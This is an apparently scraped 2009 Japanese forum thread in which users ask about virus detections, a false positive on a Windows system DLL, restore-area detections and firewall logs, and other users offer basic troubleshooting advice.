あと一瞬でてきた黒い画面は何だったのかわかる人居れば教えてください;
窓の杜にニコキャッチングとかいうのがあったからサイトにいってダウンロード&インストールし終わって
ファイルの中にあった何かわからないけど開いてみたら一瞬黒い画面の窓が開いて
英語っぽい白い文字がずらーと流れていって窓が勝手に閉じたんですが
そのあとにウィルス検索してみたら10個もかかりました(いつもは1〜2個。
名前までは覚えてませんがこの「ニコキャッチング」の中にはいっていたのでしょうか?
あと一瞬でてきた黒い画面は何だったのかわかる人居れば教えてください;
453 :名無しさん@お腹いっぱい。:2009/02/24(火) 13:21:56
>>452ですが自分で読み直してもわかりにくいものになってしまいました;
もしわかりにくかったらすいません;;
もしわかりにくかったらすいません;;
454 :名無しさん@お腹いっぱい。:2009/02/24(火) 13:35:58
455 :名無しさん@お腹いっぱい。:2009/02/24(火) 13:43:42
Virus Totalに上げてみたけど、MSとpandaしかマルウェアに認定してなかったし
砂箱内で実行してみたけど特に何もなかったが・・・
砂箱内で実行してみたけど特に何もなかったが・・・
456 :名無しさん@お腹いっぱい。:2009/02/24(火) 14:41:17
457 :名無しさん@お腹いっぱい。:2009/02/24(火) 17:47:06
ウイルスやトロイの木馬等は、いったん侵入すれば駆除しない限り存在し続けるのでしょうか。
例えば新品のPCを購入して、1ヶ月間アンチウイルスソフトを導入していなかったとします。
その後導入し、スキャンの結果ウイルスやトロイの木馬等といったものが検出されなかった場合、
そのPCは1ヶ月間まったく攻撃を受けていなかった、結果として危険性はなかったと考えてよろしいのでしょうか。
それとも、そんな単純なものではないのでしょうか。
こまめにウイルススキャンをして、そういったものが検出されなければ、一応そのつど安心してもよいものなのだろうかと思ったものでして。
よろしくお願いいたします。
例えば新品のPCを購入して、1ヶ月間アンチウイルスソフトを導入していなかったとします。
その後導入し、スキャンの結果ウイルスやトロイの木馬等といったものが検出されなかった場合、
そのPCは1ヶ月間まったく攻撃を受けていなかった、結果として危険性はなかったと考えてよろしいのでしょうか。
それとも、そんな単純なものではないのでしょうか。
こまめにウイルススキャンをして、そういったものが検出されなければ、一応そのつど安心してもよいものなのだろうかと思ったものでして。
よろしくお願いいたします。
458 :名無しさん@お腹いっぱい。:2009/02/24(火) 17:57:02
ソフトの性能によるが仮にあるアンチウイルスソフトがどんなウイルスでも
100%見つけ出す性能を持っていてそれで見つからなければ無傷といえる
ただ、100%見つけ出すものなんてないし、作ることもできないから
絶対危険性がなかったとは言い切れない
>こまめにウイルススキャンをして、そういったものが検出されなければ、一応そのつど安心してもよいものなのだろうかと思ったものでして。
とりあえず安心しでもいいです
ただ検出されなかったのではなく、検出できなかった可能性もあるので絶対大丈夫とは思わないように。
100%見つけ出す性能を持っていてそれで見つからなければ無傷といえる
ただ、100%見つけ出すものなんてないし、作ることもできないから
絶対危険性がなかったとは言い切れない
>こまめにウイルススキャンをして、そういったものが検出されなければ、一応そのつど安心してもよいものなのだろうかと思ったものでして。
とりあえず安心しでもいいです
ただ検出されなかったのではなく、検出できなかった可能性もあるので絶対大丈夫とは思わないように。
459 :457:2009/02/24(火) 18:23:11
どうもありがとうございます。
ということはウイルスやトロイの木馬等は、勝手に侵入してくることはあっても、
勝手にまた出て行ってしまう(消滅してしまう)ということはないわけですね。
アンチウイルスソフトを過信しないようにしながらも、これからもこまめにチェックするようにします。
ということはウイルスやトロイの木馬等は、勝手に侵入してくることはあっても、
勝手にまた出て行ってしまう(消滅してしまう)ということはないわけですね。
アンチウイルスソフトを過信しないようにしながらも、これからもこまめにチェックするようにします。
460 :名無しさん@お腹いっぱい。:2009/02/24(火) 22:01:42
初心者です。you tubeを開くと あやしい muhahaha!という画面が出てきて 画面が消えてしまいます。
どうしたらよいでしょうか?
どうしたらよいでしょうか?
461 :名無しさん@お腹いっぱい。:2009/02/24(火) 22:26:32
【使用OS】 「XP home SP2」
【Microsoft Update(MU)の状態】 「自動更新設定」
【使用セキュリティソフトとバージョン】 「バスター2008」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「バスター2008」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「有り」
【スキャンの結果何が検出されたか
検索時にポップアップが出て
スパイウェアの疑いが見つかりました
名前 C:\WINDOWS\SYSTEM32\ADVAPI32.DLL
危険度 高
実行した処理 隔離/隔離できません
とでて、ヘルプを参照しましたが、対処方法の表示がなく、検索も途中で
止まってしまっています。
お助けをお願いします・・
【Microsoft Update(MU)の状態】 「自動更新設定」
【使用セキュリティソフトとバージョン】 「バスター2008」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「バスター2008」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「有り」
【スキャンの結果何が検出されたか
検索時にポップアップが出て
スパイウェアの疑いが見つかりました
名前 C:\WINDOWS\SYSTEM32\ADVAPI32.DLL
危険度 高
実行した処理 隔離/隔離できません
とでて、ヘルプを参照しましたが、対処方法の表示がなく、検索も途中で
止まってしまっています。
お助けをお願いします・・
462 : ◆N9P3SuvBPo :2009/02/24(火) 22:55:04
>461
この"C:\WINDOWS\SYSTEM32\ADVAPI32.DLL"というファイルがスパイウェアの疑いがあると、出てるんですね。
virustotalで上記のファイルをスキャンしてください。
ttp://www.virustotal.com/jp/
さらに上記のファイルのプロパティを見て、作成日、会社名を教えてください。
この"C:\WINDOWS\SYSTEM32\ADVAPI32.DLL"というファイルがスパイウェアの疑いがあると、出てるんですね。
virustotalで上記のファイルをスキャンしてください。
ttp://www.virustotal.com/jp/
さらに上記のファイルのプロパティを見て、作成日、会社名を教えてください。
463 :名無しさん@お腹いっぱい。:2009/02/24(火) 23:09:09
>>462
>この"C:\WINDOWS\SYSTEM32\ADVAPI32.DLL"というファイルがスパイウェアの疑いがあると、出てるんですね。
virustotalで上記のファイルをスキャンしてください。
ttp://www.virustotal.com/jp/
virustotalというのは初めて使用しましたが、
一行下記行がありました。
アンチウイルス バージョン 更新日 結果
Sunbelt 3.2.1851.2 2009.02.12 Trojan.Win32.Patched.B (vf)
>さらに上記のファイルのプロパティを見て、作成日、会社名を教えてください。
作成日 2001/12/4
会社名 Microsoft Corporation
となっております。
よろしくお願いします・・
>この"C:\WINDOWS\SYSTEM32\ADVAPI32.DLL"というファイルがスパイウェアの疑いがあると、出てるんですね。
virustotalで上記のファイルをスキャンしてください。
ttp://www.virustotal.com/jp/
virustotalというのは初めて使用しましたが、
一行下記行がありました。
アンチウイルス バージョン 更新日 結果
Sunbelt 3.2.1851.2 2009.02.12 Trojan.Win32.Patched.B (vf)
>さらに上記のファイルのプロパティを見て、作成日、会社名を教えてください。
作成日 2001/12/4
会社名 Microsoft Corporation
となっております。
よろしくお願いします・・
464 : ◆N9P3SuvBPo :2009/02/24(火) 23:26:14
>463
正規ファイル…か。
さてどうしたものやろ…とりあえず「リカバリをお奨めします」と言っておこうか。
その問題のファイルのサイズ(バイト数)を控えてください。
次に、問題のファイルの名前を変更してください。(ADVAPI32.DLL→ADVAPI32.BAKに)
暫く待てば、名前を変えたファイルの隣に「ADVAPI32.DLL」という名前のファイルが作成されると思います。
新たに作成された、ADVAPI32.DLLとADVAPI32.BAKのファイルサイズを教えてください。
正規ファイル…か。
さてどうしたものやろ…とりあえず「リカバリをお奨めします」と言っておこうか。
その問題のファイルのサイズ(バイト数)を控えてください。
次に、問題のファイルの名前を変更してください。(ADVAPI32.DLL→ADVAPI32.BAKに)
暫く待てば、名前を変えたファイルの隣に「ADVAPI32.DLL」という名前のファイルが作成されると思います。
新たに作成された、ADVAPI32.DLLとADVAPI32.BAKのファイルサイズを教えてください。
465 :名無しさん@お腹いっぱい。:2009/02/24(火) 23:35:26
>>464
新たに作成された、ADVAPI32.DLLとADVAPI32.BAKのファイルサイズを教えてください。
advapi.dll → 658KB
advapi.bak → 658KB
advapi.dllは変更前、後共に同じファイルサイズです。
何か対策があれば是非・・・m(_ _)m
新たに作成された、ADVAPI32.DLLとADVAPI32.BAKのファイルサイズを教えてください。
advapi.dll → 658KB
advapi.bak → 658KB
advapi.dllは変更前、後共に同じファイルサイズです。
何か対策があれば是非・・・m(_ _)m
466 :465:2009/02/24(火) 23:38:53
「advapi」→「advapi32」
の間違いです。
すみません
の間違いです。
すみません
467 : ◆N9P3SuvBPo :2009/02/24(火) 23:39:29
>465
658KBの横にある()の中の数値も一緒ですか?
あと、先ほどのvirustotalで問題のファイルをスキャンしてみましたか?
スキャンしたのなら、結果をURLを貼って教えてください。
658KBの横にある()の中の数値も一緒ですか?
あと、先ほどのvirustotalで問題のファイルをスキャンしてみましたか?
スキャンしたのなら、結果をURLを貼って教えてください。
468 :名無しさん@お腹いっぱい。:2009/02/24(火) 23:40:15
>>465
トレンドマイクロに検体に出して調べてもらう
トレンドマイクロに検体に出して調べてもらう
469 :645:2009/02/24(火) 23:46:45
>>467
>658KBの横にある()の中の数値も一緒ですか?
はい。同じです→673,792byte
検索結果
ttp://www.virustotal.com/jp/analisis/0f2eee7109212a1f36a9e05c3b127c0d
重ねてよろしくお願いいたします
>658KBの横にある()の中の数値も一緒ですか?
はい。同じです→673,792byte
検索結果
ttp://www.virustotal.com/jp/analisis/0f2eee7109212a1f36a9e05c3b127c0d
重ねてよろしくお願いいたします
470 : ◆N9P3SuvBPo :2009/02/24(火) 23:51:30
>468
virustotalでスキャンすれば、アップロードされたファイルは各ベンダーに
送られるんじゃなかった?
>469
どうやら誤検出ですね…リカバリしなくても大丈夫です。
後はadvapi32.bakの方を削除しても構いません。(今削除できなくても再起動後に削除できるはずです)
advapi32.dllの方は削除しないように。
virustotalでスキャンすれば、アップロードされたファイルは各ベンダーに
送られるんじゃなかった?
>469
どうやら誤検出ですね…リカバリしなくても大丈夫です。
後はadvapi32.bakの方を削除しても構いません。(今削除できなくても再起動後に削除できるはずです)
advapi32.dllの方は削除しないように。
471 :名無しさん@お腹いっぱい。:2009/02/25(水) 00:03:39
472 :名無しさん@お腹いっぱい。:2009/02/25(水) 00:09:36
>>470
VirusTotal に送られたファイルはアンチウイルスベンダが
持ち込んだ取得できないウイルスの一覧に該当するウイルスを
自動解析にかけ、マルウェアと認定された場合に製品に取り込まれる
このプロセスどおりなら false positive は放置の可能性がある。
ttp://www.virustotal.com/privacy.html
# Collection and use of submit samples and personal information の項
dll 一つだけで誤検出の可能性が高いならば、
正規ユーザなんだろうから、トレンドに調べもらうのが一番固い。
それまでは新たに生成された dll を使ってれば多少はリスクも減る。
VirusTotal に送られたファイルはアンチウイルスベンダが
持ち込んだ取得できないウイルスの一覧に該当するウイルスを
自動解析にかけ、マルウェアと認定された場合に製品に取り込まれる
このプロセスどおりなら false positive は放置の可能性がある。
ttp://www.virustotal.com/privacy.html
# Collection and use of submit samples and personal information の項
dll 一つだけで誤検出の可能性が高いならば、
正規ユーザなんだろうから、トレンドに調べもらうのが一番固い。
それまでは新たに生成された dll を使ってれば多少はリスクも減る。
473 : ◆N9P3SuvBPo :2009/02/25(水) 00:38:10
>472
てことは、各ベンダーに送られるんじゃなくて、各ベンダーのスキャンエンジンによって
アップロードされたファイルをスキャンしてるってこと?
誤検出で間違いありませんよ。
こちらもXPSP2のPCを持ってまして、
"C:\WINDOWS\SYSTEM32\ADVAPI32.DLL"のプロパティを調べてみたところ、
作成日は「2005年12月22日」と、>463と異なりましたが
会社名は「Microsoft Corporation」
ファイルサイズは658KB(673,792byte)でしたので。
XPSP3やVistaではどうか知りませんけど…。
てことは、各ベンダーに送られるんじゃなくて、各ベンダーのスキャンエンジンによって
アップロードされたファイルをスキャンしてるってこと?
誤検出で間違いありませんよ。
こちらもXPSP2のPCを持ってまして、
"C:\WINDOWS\SYSTEM32\ADVAPI32.DLL"のプロパティを調べてみたところ、
作成日は「2005年12月22日」と、>463と異なりましたが
会社名は「Microsoft Corporation」
ファイルサイズは658KB(673,792byte)でしたので。
XPSP3やVistaではどうか知りませんけど…。
474 :名無しさん@お腹いっぱい。:2009/02/25(水) 01:19:23
>>473
あくまでも想像でしかないので、軽く聞き流してくれ。
AV担当者:「これらのウイルスのサンプルをくれ」
VT担当者:「へい、調べときやす」
:
VT担当者:「マルウェアのサンプル一覧ができたのでお渡しします」
AV担当者:「ありがとさん」
ってな流れになっているように読めた。
あくまでも想像でしかないので、軽く聞き流してくれ。
AV担当者:「これらのウイルスのサンプルをくれ」
VT担当者:「へい、調べときやす」
:
VT担当者:「マルウェアのサンプル一覧ができたのでお渡しします」
AV担当者:「ありがとさん」
ってな流れになっているように読めた。
475 :名無しさん@お腹いっぱい。:2009/02/25(水) 15:06:25
質問です
クリーンインストールだけじゃなくハードディスクもグラフィックボードもマザーボードも
メモリーもプロセッサーもCDドライブも交換したのにxeroxというフォルダが消えません
どうすればいいのですか
クリーンインストールだけじゃなくハードディスクもグラフィックボードもマザーボードも
メモリーもプロセッサーもCDドライブも交換したのにxeroxというフォルダが消えません
どうすればいいのですか
476 :名無しさん@お腹いっぱい。:2009/02/25(水) 16:22:45
質問です。マッキントッシュユーザーなのですが、
ウィルスに感染してしまったようで
フォルダやファイルやアプリケーションを開くたびに
音声がいちいち低い声で読み上げます。
何のウィルスか知っている方がいらしたら教えていただけないでしょうか。
よろしくお願いします。
ウィルスに感染してしまったようで
フォルダやファイルやアプリケーションを開くたびに
音声がいちいち低い声で読み上げます。
何のウィルスか知っている方がいらしたら教えていただけないでしょうか。
よろしくお願いします。
477 :名無しさん@お腹いっぱい。:2009/02/25(水) 16:24:40
質問です。マッキントッシュユーザーなのですが、
ウィルスに感染してしまったようで
フォルダやファイルやアプリケーションを開くたびに
音声がいちいち低い声で読み上げます。
何のウィルスか知っている方がいらしたら教えていただけないでしょうか。
よろしくお願いします。
ウィルスに感染してしまったようで
フォルダやファイルやアプリケーションを開くたびに
音声がいちいち低い声で読み上げます。
何のウィルスか知っている方がいらしたら教えていただけないでしょうか。
よろしくお願いします。
478 :名無しさん@お腹いっぱい。:2009/02/25(水) 17:28:36
おもしれぇウィルスじゃんw
479 :名無しさん@お腹いっぱい。:2009/02/25(水) 18:09:25
質問いいですか。
peercastで何か視聴しようとすると、
カスペル先生が以下のダイアログを通知してきて通信遮断されるので視聴できないんです。
qvod.exeという中国産のプレーヤーらしいのですが、それ以上はぐぐってもほとんど情報がないので
どう対策したものかと困っています。情報あれば教えてほしいです。
http://up2.viploader.net/pic2/src/viploaderf150614.png
peercastで何か視聴しようとすると、
カスペル先生が以下のダイアログを通知してきて通信遮断されるので視聴できないんです。
qvod.exeという中国産のプレーヤーらしいのですが、それ以上はぐぐってもほとんど情報がないので
どう対策したものかと困っています。情報あれば教えてほしいです。
http://up2.viploader.net/pic2/src/viploaderf150614.png
480 :名無しさん@お腹いっぱい。:2009/02/25(水) 18:31:49
481 :名無しさん@お腹いっぱい。:2009/02/25(水) 18:43:06
>>480
おお、情報thxであります。
おお、情報thxであります。
482 :名無しさん@お腹いっぱい。:2009/02/25(水) 22:53:44
>>475
正常です。全く問題ないよ
正常です。全く問題ないよ
483 :名無しさん@お腹いっぱい。:2009/02/26(木) 00:06:24
>>475
xerox フォルダ でぐぐれ
xerox フォルダ でぐぐれ
484 :名無しさん@お腹いっぱい。:2009/02/26(木) 09:16:29
あるサイトでHTML:Iframe-infというウィルスを踏んだのですがどう対処すればいいですか?
アンチウィルスソフトはavastを使っていて一応チェストに移動しました。
アンチウィルスソフトはavastを使っていて一応チェストに移動しました。
485 :名無しさん@お腹いっぱい。:2009/02/27(金) 03:23:13
486 :名無しさん@お腹いっぱい。:2009/02/27(金) 13:25:52
487 :名無しさん@お腹いっぱい。:2009/02/28(土) 13:16:34
書き込めないって出たけどアクブロされてんのかな。
488 :名無しさん@お腹いっぱい。:2009/02/28(土) 13:18:22
あ書けた。改行数かな。ちょっとお願いします。
「アプリケーションの変更と削除」から「Adobe Flash Player ActiveX」を選んで消そうとしたんですが
削除できずに無反応と思ったらイカのようなファイルが生成され
Au_exe ns643.tmpのようなプロセスが起動していました。
生成するフォルダやファイルで調べると
ttp://www.mcafee.com/japan/security/virG2008.asp?v=Generic%20PUP.x!1D0E5B2B
のような有害なプログラムの生成ファイルと似ていることがわかりましたが
FWで警告も出ないので特に外部と通信している様子もなく再起動したら問題なく消せました。
これが長時間起動していたOSの不調でうまくアンインストできなかっただけなのか
それとも本当に有害だったのかがわからないためどなたかわかる方おられないでしょうか。
Ad-awareやAvastなどで検索かけてみましたが特にひっかかりませんでした。
「アプリケーションの変更と削除」から「Adobe Flash Player ActiveX」を選んで消そうとしたんですが
削除できずに無反応と思ったらイカのようなファイルが生成され
Au_exe ns643.tmpのようなプロセスが起動していました。
生成するフォルダやファイルで調べると
ttp://www.mcafee.com/japan/security/virG2008.asp?v=Generic%20PUP.x!1D0E5B2B
のような有害なプログラムの生成ファイルと似ていることがわかりましたが
FWで警告も出ないので特に外部と通信している様子もなく再起動したら問題なく消せました。
これが長時間起動していたOSの不調でうまくアンインストできなかっただけなのか
それとも本当に有害だったのかがわからないためどなたかわかる方おられないでしょうか。
Ad-awareやAvastなどで検索かけてみましたが特にひっかかりませんでした。
489 :名無しさん@お腹いっぱい。:2009/02/28(土) 13:18:50
C:\Documents and Settings\ユーザ名\Local Settings\Temp\nss642.tmp
フォルダ
C:\Documents and Settings\ユーザ名\Local Settings\Temp\nss642.tmp\ns643.tmp
6144 byte
C:\Documents and Settings\ユーザ名\Local Settings\Temp\nss642.tmp\nsExec.dll
6144 byte
実行するたびに数値が増えていく。
C:\Documents and Settings\ユーザ名\Local Settings\Temp\~nsu.tmp\Au_.exe
説明:Adobe@ Flash@ Player ActiveX Installer
89,102 byte
実行するたびに Bu_.exe のように~nsu.tmp内のファイルが増えていく。
C:\WINNT\system32\Macromed\Flash\uninstall_activeX.exe
説明:Adobe@ Flash@ Player ActiveX Installer
89,102 byte
アンインストールプログラムのようだがこれが実行されると上のような不可解な挙動をする。
再起動した後に実行すると消えた。
【使用OS】 「Windows2k」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「Avast4.8」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「した」
【スパイウェア対策ソフト】 「SpyBot」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「した」
【ルータの有無】 「なし」
フォルダ
C:\Documents and Settings\ユーザ名\Local Settings\Temp\nss642.tmp\ns643.tmp
6144 byte
C:\Documents and Settings\ユーザ名\Local Settings\Temp\nss642.tmp\nsExec.dll
6144 byte
実行するたびに数値が増えていく。
C:\Documents and Settings\ユーザ名\Local Settings\Temp\~nsu.tmp\Au_.exe
説明:Adobe@ Flash@ Player ActiveX Installer
89,102 byte
実行するたびに Bu_.exe のように~nsu.tmp内のファイルが増えていく。
C:\WINNT\system32\Macromed\Flash\uninstall_activeX.exe
説明:Adobe@ Flash@ Player ActiveX Installer
89,102 byte
アンインストールプログラムのようだがこれが実行されると上のような不可解な挙動をする。
再起動した後に実行すると消えた。
【使用OS】 「Windows2k」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「Avast4.8」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「した」
【スパイウェア対策ソフト】 「SpyBot」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「した」
【ルータの有無】 「なし」
490 :名無しさん@お腹いっぱい。:2009/02/28(土) 14:08:51
ウィルスソフトでお勧めってなんですか?
3台のpcに使いたいのでウィルスバスターを使ってるんですが
もっといいのありますか?
3台のpcに使いたいのでウィルスバスターを使ってるんですが
もっといいのありますか?
491 :名無しさん@お腹いっぱい。:2009/02/28(土) 14:14:18
バスターが最底辺だと思います
492 :名無しさん@お腹いっぱい。:2009/03/01(日) 14:21:03
【使用OS】Windows XP
【Microsoft Update(MU)の状態】最新
【使用セキュリティソフトとバージョン】ウイルスセキュリティ0
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】最近
【スパイウェア対策ソフト】 同上?
【スパイウェア対策ソフトの更新は定期的に行なっているか】同上
【ルータの有無】あり
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
Windows Defenderにて検出されました。
カテゴリ:トロイの木馬
リソース:
process:
pid:1780
file:
C:\WINDOWS\system32\dsewtds0.dll
消去しても再起動すると再度検出されます。
セキュリティ0では未検出でした。
【Microsoft Update(MU)の状態】最新
【使用セキュリティソフトとバージョン】ウイルスセキュリティ0
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】最近
【スパイウェア対策ソフト】 同上?
【スパイウェア対策ソフトの更新は定期的に行なっているか】同上
【ルータの有無】あり
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
Windows Defenderにて検出されました。
カテゴリ:トロイの木馬
リソース:
process:
pid:1780
file:
C:\WINDOWS\system32\dsewtds0.dll
消去しても再起動すると再度検出されます。
セキュリティ0では未検出でした。
493 :名無しさん@お腹いっぱい。:2009/03/01(日) 14:26:22
494 :名無しさん@お腹いっぱい。:2009/03/01(日) 14:31:09
495 :名無しさん@お腹いっぱい。:2009/03/01(日) 15:45:04
【使用OS】Vista HomePremium SP1
【Microsoft Update(MU)の状態】最新
【使用セキュリティソフトとバージョン】Symantec Norton Internet Security 2009 v16.1.0.33
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】最新
【スパイウェア対策ソフト】ノートンとspybot
【スパイウェア対策ソフトの更新は定期的に行なっているか】最新
【ルータの有無】あり
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
スキャンの結果というか、昨日あたりから1分近い間隔で
「未使用ポート遮断機能が通信を遮断しました。インバウンドTCP接続」ってログが出るんですよね
これってノートンが過剰反応してるだけなんですかね?ちょっと気持ち悪くて
【Microsoft Update(MU)の状態】最新
【使用セキュリティソフトとバージョン】Symantec Norton Internet Security 2009 v16.1.0.33
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】最新
【スパイウェア対策ソフト】ノートンとspybot
【スパイウェア対策ソフトの更新は定期的に行なっているか】最新
【ルータの有無】あり
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
スキャンの結果というか、昨日あたりから1分近い間隔で
「未使用ポート遮断機能が通信を遮断しました。インバウンドTCP接続」ってログが出るんですよね
これってノートンが過剰反応してるだけなんですかね?ちょっと気持ち悪くて
496 :名無しさん@お腹いっぱい。:2009/03/01(日) 20:50:05
>>495
正確な事は分からんけど、ルーターが有ってインバウンドがあるということは、ルーターに穴が開いている可能性がある。
正確な事は分からんけど、ルーターが有ってインバウンドがあるということは、ルーターに穴が開いている可能性がある。
497 :名無しさん@お腹いっぱい。:2009/03/01(日) 21:06:32
【使用OS】 「WinXP」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ウィルスバスタ-2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「されている」
【スパイウェア対策ソフト】 「ウィルスバスター2009」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「なっている」
【ルータの有無】 「無し」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
ウイルス名 "TROJ_Generic.DIS"
パス "F:\System Volume Information\_restore{CB2759E9-4605-4FE1-8447-29F266474282}\RP120\A0018563.exe"
ログを見たところ、一週間前から一日に8件ほど検出されています。パス名等は同じです。
Fドライブは倉庫用として使っています。
駆除できていないと考えて良いのでしょうか?
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ウィルスバスタ-2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「されている」
【スパイウェア対策ソフト】 「ウィルスバスター2009」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「なっている」
【ルータの有無】 「無し」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
ウイルス名 "TROJ_Generic.DIS"
パス "F:\System Volume Information\_restore{CB2759E9-4605-4FE1-8447-29F266474282}\RP120\A0018563.exe"
ログを見たところ、一週間前から一日に8件ほど検出されています。パス名等は同じです。
Fドライブは倉庫用として使っています。
駆除できていないと考えて良いのでしょうか?
498 :名無しさん@お腹いっぱい。:2009/03/01(日) 21:09:40
システムの復元領域だから、ウィルス対策ソフトでは駆除できないんじゃないの。
いったんシステムの復元を無効にすれば消えると思う。
いったんシステムの復元を無効にすれば消えると思う。
499 : ◆N9P3SuvBPo :2009/03/01(日) 21:17:04
>497
問題なし
498の言う通りシステムの復元を無効→有効→再スキャン
検出されなくなればOK
この“System Volume Information”は対策ソフトですら手が出せない領域なので
アクセスが拒否されて駆除失敗するのは当然です。
それとできることならルーターも有ったほうがよいと思います。
問題なし
498の言う通りシステムの復元を無効→有効→再スキャン
検出されなくなればOK
この“System Volume Information”は対策ソフトですら手が出せない領域なので
アクセスが拒否されて駆除失敗するのは当然です。
それとできることならルーターも有ったほうがよいと思います。
500 :名無しさん@お腹いっぱい。:2009/03/01(日) 21:24:09
501 :名無しさん@お腹いっぱい。:2009/03/01(日) 22:13:45
502 :名無しさん@お腹いっぱい。:2009/03/01(日) 22:17:16
503 :名無しさん@お腹いっぱい。:2009/03/02(月) 13:17:45
どこで聞いたら良いかわからなかったのですが、お願いします。
エロ動画サイトのサンプル動画ってダウンロードすると
電話帳データ抜き取られる事があると噂に聞いたんですが本当ですか?
マジレス願います。
エロ動画サイトのサンプル動画ってダウンロードすると
電話帳データ抜き取られる事があると噂に聞いたんですが本当ですか?
マジレス願います。
504 :名無しさん@お腹いっぱい。:2009/03/02(月) 15:25:15
ADSLモデム、ADSLルータのメモリに直接感染して悪さをする、通信を不安定にするような
ウイルスなどは存在しますか。
いつからか、インターネットに繋いだときのレスポンスが悪くなる現象が目立つようになり、
突如としてADSLルータにすら接続できなくなったりする現象に遭遇するようになりました。
モデムを再起動すると一時的に改善しますが、この現象が頻繁に起きるようになったのです。
そこでこれまで使っていたADSLルータを新しいADSLルータに交換したらこの現象はなくなりました。
ひょっとすると、これはルータのハードウェア的障害が原因ではなく、ウイルスが原因だったのでしょうか?
ウイルスなどは存在しますか。
いつからか、インターネットに繋いだときのレスポンスが悪くなる現象が目立つようになり、
突如としてADSLルータにすら接続できなくなったりする現象に遭遇するようになりました。
モデムを再起動すると一時的に改善しますが、この現象が頻繁に起きるようになったのです。
そこでこれまで使っていたADSLルータを新しいADSLルータに交換したらこの現象はなくなりました。
ひょっとすると、これはルータのハードウェア的障害が原因ではなく、ウイルスが原因だったのでしょうか?
505 :名無しさん@お腹いっぱい。:2009/03/02(月) 18:53:30
>>503
エロ動画とかエロいなお前
エロ動画とかエロいなお前
506 :名無しさん@お腹いっぱい。:2009/03/02(月) 19:39:56
知恵をお貸しください。
友人のことなのですが、巡回したサイトに次々と誹謗中傷の書き込みがされるそうです。
中傷の内容は本人特定がギリギリできないレベルで、警察やプロバイダーに相談しても実害が出ていないと手が出せないと言われました。
そのためにPCをノートからデスクトップに代えたらしいのですが、それでも嫌がらせが続くようです。
・OSなどの使用環境は未確認
・ネットワークは有線接続
・ウィルス対策ソフトは導入(ソフト名は未確認)
・犯人の目星はついているが証拠がないため手が出せない
知っている情報は以上です。
おそらくウィルスで巡回サイトを特定されていると思い、リカバリを勧めたのですが他に良い自衛方法があれば教えて下さい。
友人のことなのですが、巡回したサイトに次々と誹謗中傷の書き込みがされるそうです。
中傷の内容は本人特定がギリギリできないレベルで、警察やプロバイダーに相談しても実害が出ていないと手が出せないと言われました。
そのためにPCをノートからデスクトップに代えたらしいのですが、それでも嫌がらせが続くようです。
・OSなどの使用環境は未確認
・ネットワークは有線接続
・ウィルス対策ソフトは導入(ソフト名は未確認)
・犯人の目星はついているが証拠がないため手が出せない
知っている情報は以上です。
おそらくウィルスで巡回サイトを特定されていると思い、リカバリを勧めたのですが他に良い自衛方法があれば教えて下さい。
507 :名無しさん@お腹いっぱい。:2009/03/02(月) 20:08:53
508 :名無しさん@お腹いっぱい。:2009/03/02(月) 20:14:33
>>507
釣りだから無視しろよ
釣りだから無視しろよ
509 :名無しさん@お腹いっぱい。:2009/03/02(月) 20:40:21
頭の悪い奴がオウム返しのようにレス処理しているからこのスレには価値がない
誘導したらこいつらも付いてくるからそれも無理
とにかくググれ!
誘導したらこいつらも付いてくるからそれも無理
とにかくググれ!
510 :名無しさん@お腹いっぱい。:2009/03/02(月) 20:41:13
ごめん、スレ間違っちゃったよm(_ _)m
あはは、釣り認定されましたか^^;
じゃあ質問を変えます
他人のPCをリモートで監視するソフトってありますか?
じゃあ質問を変えます
他人のPCをリモートで監視するソフトってありますか?
512 :名無しさん@お腹いっぱい。:2009/03/02(月) 22:11:11
ある
513 :名無しさん@お腹いっぱい。:2009/03/03(火) 11:59:03
NOD使ってるんだけど、時々右下にIDとパスが違いますって出ます。
これはなんでしょうか
これはなんでしょうか
514 :名無しさん@お腹いっぱい。:2009/03/03(火) 12:01:33
>>511
PCに詳しい人は、ルータやモデムの仕様を知っていて、リモートホスト判れば何でも出来るんだよ。
PCに詳しい人は、ルータやモデムの仕様を知っていて、リモートホスト判れば何でも出来るんだよ。
515 :名無しさん@お腹いっぱい。:2009/03/04(水) 21:16:17
>>514
家のネット回線?は有線でPC同士で繋がっている状態なんだけど
この状態だと家族の中でもPCの画面覗くことってできます?
なんか親父が俺のPC覗いてるような気がしてならない(理由は色々とあるんだけども
というか話変わるんだけど
ウィルスバスター2009でほぼ毎日検索かけてるんですが
今PCに元々はいっていたノートンセキュリティーが検索をかけだして
まだ途中なんですが22個のクッキーと2個のウィルスが検出されています
でも今日ウィルスバスターで検索をかけていたのにこの数は多すぎだと思うのですが
これはウィルスバスターが検出できないようなものもノートンが検出したということでしょうか?
家のネット回線?は有線でPC同士で繋がっている状態なんだけど
